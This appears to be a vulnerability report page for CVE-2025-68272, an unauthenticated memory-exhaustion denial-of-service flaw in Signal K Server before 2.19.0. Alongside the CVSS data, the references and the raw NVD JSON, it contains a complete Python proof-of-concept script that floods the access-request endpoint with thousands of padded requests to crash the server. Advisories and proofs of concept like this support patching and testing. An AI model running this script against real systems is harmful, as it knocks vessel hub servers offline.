Security Vulnerability Report
CVE-2025-68272 CVSS 7.5 HIGH

Published: 2026-01-01 18:15:41
Last Modified: 2026-01-06 18:23:55

Description

Signal K Server is a server application that runs on a central hub in a boat. A Denial of Service (DoS) vulnerability in versions prior to 2.19.0 allows an unauthenticated attacker to crash the SignalK Server by flooding the access request endpoint (`/signalk/v1/access/requests`). This causes a "JavaScript heap out of memory" error due to unbounded in-memory storage of request objects. Version 2.19.0 fixes the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:* - VULNERABLE
Signal K Server < 2.19.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-68272 PoC - Signal K Server DoS Exploit
Signal K Server < 2.19.0 - Unbounded Memory Consumption in /signalk/v1/access/requests
"""
import requests
import time
import sys

TARGET_URL = "http://target-server:3000/signalk/v1/access/requests"
NUM_REQUESTS = 10000
DELAY = 0.001  # Delay between requests in seconds


def create_request_payload(request_id):
    """Create a malicious access request payload"""
    return {
        "clientId": f"malicious-client-{request_id}",
        "description": "Access request for navigation data",
        "permissions": ["read", "write"],
        "metadata": {
            "source": "poc-exploit",
            "timestamp": time.time(),
            "data": "x" * 1000  # Additional payload size
        }
    }


def exploit_dos():
    """Send rapid requests to exhaust server memory"""
    print(f"[*] Starting DoS attack against {TARGET_URL}")
    print(f"[*] Target: Signal K Server < 2.19.0")
    print(f"[*] Sending {NUM_REQUESTS} requests...")

    success_count = 0
    error_count = 0

    for i in range(NUM_REQUESTS):
        try:
            response = requests.post(
                TARGET_URL,
                json=create_request_payload(i),
                headers={"Content-Type": "application/json"},
                timeout=5
            )
            success_count += 1
            if i % 100 == 0:
                print(f"[*] Progress: {i}/{NUM_REQUESTS} requests sent")
        except requests.exceptions.RequestException as e:
            error_count += 1
            if "Connection" in str(e) or "Timeout" in str(e):
                print(f"[!] Server may be down or unresponsive after {i} requests")
                break
        time.sleep(DELAY)

    print(f"\n[*] Attack completed")
    print(f"[*] Successful requests: {success_count}")
    print(f"[*] Errors: {error_count}")
    print(f"[!] Check if server is still responsive")


if __name__ == "__main__":
    exploit_dos()

References

https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 (Release Notes)
https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68272", "sourceIdentifier": "[email protected]", "published": "2026-01-01T18:15:40.700", "lastModified": "2026-01-06T18:23:55.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Signal K Server is a server application that runs on a central hub in a boat. A Denial of Service (DoS) vulnerability in versions prior to 2.19.0 allows an unauthenticated attacker to crash the SignalK Server by flooding the access request endpoint (`/signalk/v1/access/requests`). This causes a \"JavaScript heap out of memory\" error due to unbounded in-memory storage of request objects. Version 2.19.0 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:signalk:signal_k_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19.0", "matchCriteriaId": "102A9593-CCDC-4532-8201-E67EEFC665E0"}]}]}], "references": [{"url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}